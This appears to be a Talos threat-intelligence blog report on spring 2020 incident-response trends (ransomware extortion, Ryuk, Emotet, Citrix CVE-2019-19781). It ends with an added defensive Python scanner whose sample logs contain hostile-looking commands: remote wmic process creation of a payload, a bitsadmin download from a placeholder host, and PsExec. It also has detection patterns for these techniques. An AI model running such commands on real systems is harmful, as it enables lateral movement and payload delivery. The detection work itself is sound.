Quarterly Report: Incident Response trends in Spring 2020

Talos Blog – David Liebenberg
Cisco Talos Incident Response (CTIR) engagements continue to be dominated by ransomware and commodity trojans. As alluded to in last quarter's report, ransomware actors have begun threatening to release sensitive information from victims as a means of further compelling them to pay. Additionally, DDoS and coinminer threats reemerged in spring 2020 after absences in the previous quarter.

Looking at information from November 2019 through January 2020, ransomware maintains its status as the most prevalent threat, and CTIR has observed some changes in the top ransomware offender, Ryuk. The top targeted verticals were financial services and government, a change from last quarter when the top targeted vertical was manufacturing. Although there were some new trends this quarter, including ransomware actors adding extortion to their toolkit, increased observations of the use of the red-teaming tool Cobalt Strike, and an uptick in the exploitation of a vulnerability in the Citrix Application Delivery Controller (CVE-2019-19781), this quarter demonstrated the continued threat posed by ransomware, particularly Ryuk, and commodity trojans such as Emotet and Trickbot.

We observed the extortion tactic in two engagements involving Maze ransomware actors, in which the adversaries exfiltrated sensitive information to an FTP server and threatened to publish it if the ransom was not paid. The Maze team has continued to use this tactic, creating a public website where they release information regarding affected organizations. Other ransomware actors have begun following suit as well, including Sodinokibi, Nemty, DoppelPaymer, Nefilim, CLOP and Sekhmet. This is a particularly dangerous trend since it further compels victims to pay and negates traditional ways of combating ransomware attacks, such as maintaining backups.

CTIR also observed continued exploitation of web applications, particularly the Citrix Application Delivery Controller (CVE-2019-19781).
CTIR also observed a shift from Ryuk actors leveraging PSExec to deploy Ryuk to more use of Windows Management Instrumentation (WMI), BITSAdmin, and the red-teaming framework Cobalt Strike.
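The shift from PsExec to WMI and BITSAdmin changes what a defender should look for in endpoint telemetry. The following is an added example, not Talos code or any CTIR tooling: a small Python scanner over constructed process-creation records (a hypothetical `timestamp|host|user|image|command_line` format, modelled loosely on what an EDR or Sysmon event 1 export might give you) that flags the three deployment methods the report names, remote WMI process creation, BITSAdmin transfers and PsExec, and then lists hosts on which more than one of them appears, since that combination is a stronger signal of staging and lateral movement than any single hit.

```python
import re
from dataclasses import dataclass

# Constructed sample records (hypothetical format: timestamp|host|user|image|command_line).
# Lines 1-3 are the kind of activity the report describes; lines 4-5 are benign noise.
SAMPLE_LOG = """\
2020-03-02T10:14:01|WS-042|corp\\jdoe|C:\\Windows\\System32\\wbem\\wmic.exe|wmic /node:FS-01 process call create "cmd.exe /c \\\\FS-01\\share\\payload.exe"
2020-03-02T10:14:09|WS-042|corp\\jdoe|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer job1 http://example.invalid/x.dat C:\\Users\\Public\\x.dat
2020-03-02T10:15:30|WS-042|corp\\svc-deploy|C:\\Tools\\PsExec.exe|PsExec.exe \\\\FS-01 -s cmd.exe
2020-03-02T10:16:00|WS-043|corp\\asmith|C:\\Windows\\System32\\wbem\\wmic.exe|wmic os get caption
2020-03-02T10:17:45|WS-043|corp\\asmith|C:\\Program Files\\App\\app.exe|app.exe --update
"""

# Detection rules (name, regex over the command line). Assumed patterns, tuned to the
# three execution methods named in the report, not an exhaustive rule set.
RULES = [
    # wmic invoked against a remote node to spawn a process
    ("wmi_remote_process_create", r"wmic(?:\.exe)?.*\s/node:\S+.*process\s+call\s+create"),
    # bitsadmin used to pull a file down
    ("bitsadmin_transfer", r"bitsadmin(?:\.exe)?.*\s/transfer\b"),
    # PsExec pointed at a remote host (\\HOST)
    ("psexec_remote_exec", r"psexec(?:\.exe)?\s+\\\\\S+"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]


@dataclass
class Finding:
    line_no: int
    rule: str
    host: str
    user: str
    command_line: str


def parse_record(line):
    """Split one pipe-delimited record; return None for malformed lines."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    timestamp, host, user, image, command_line = parts
    return {"timestamp": timestamp, "host": host, "user": user,
            "image": image, "command_line": command_line}


def scan(log_text):
    """Run every rule over every record; one Finding per (record, rule) match."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_record(line)
        if rec is None:
            continue
        for name, pattern in COMPILED:
            if pattern.search(rec["command_line"]):
                findings.append(Finding(line_no, name, rec["host"],
                                        rec["user"], rec["command_line"]))
    return findings


def suspicious_hosts(findings, min_techniques=2):
    """Hosts on which at least min_techniques distinct rules fired."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.rule)
    return {host: rules for host, rules in by_host.items()
            if len(rules) >= min_techniques}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"line {h.line_no}: {h.rule} on {h.host} as {h.user}: {h.command_line}")
    for host, rules in suspicious_hosts(hits).items():
        print(f"escalate {host}: {sorted(rules)}")
```

The `/node:` check matters: local `wmic` queries are common administrative noise (line 4 above is deliberately not flagged), whereas remote process creation from a workstation is rare in most environments. The same host-level correlation would apply to whatever ingestion format you actually have; only `parse_record` needs to change.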
Link: https://blog.talosintelligence.com/2020/04/IR-quarterly-threat-report-spring-2020.html

